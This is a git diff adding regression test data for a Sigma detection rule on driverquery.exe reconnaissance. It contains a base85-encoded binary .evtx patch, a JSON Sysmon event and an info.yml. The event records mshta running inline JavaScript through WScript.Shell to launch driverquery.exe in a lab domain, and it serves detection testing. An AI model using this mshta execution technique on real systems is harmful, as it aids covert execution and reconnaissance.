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 ZReGC7SeQQgoke1v@tg7Z!mHmc@c&Fl6G8w0 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json new file mode 100644 index 000000000..d2d824504 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:53:43.425641Z" + } + }, + "EventRecordID": 33534161, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:53:43.425", + "ProcessGuid": "5AA13A44-B487-68FE-7F5F-000000004002", + "ProcessId": 2052, + "Image": "C:\\Windows\\System32\\driverquery.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Queries the drivers on a system", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "drvqry.exe", + "CommandLine": "\"C:\\Windows\\System32\\driverquery.exe\"", + "CurrentDirectory": "C:\\Windows\\Temp\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461", + "ParentProcessGuid": "5AA13A44-B487-68FE-7E5F-000000004002", + "ParentProcessId": 11360, + "ParentImage": "C:\\Windows\\System32\\mshta.exe", + "ParentCommandLine": "mshta \"javascript:new ActiveXObject('WScript.Shell').Run('driverquery.exe');close();\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml new file mode 100644 index 000000000..4cc1aabef --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml @@ -0,0 +1,12 @@ +id: 585f7fa9-392b-4609-b324-4701482de7ec +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd + title: Potential Recon Activity Using DriverQuery.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx new file mode 100644 index 0000000000000000000000000000000000000000..0cb95a003a3064c548c503e325947c55662c8490 GIT binary patch literal 69632 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 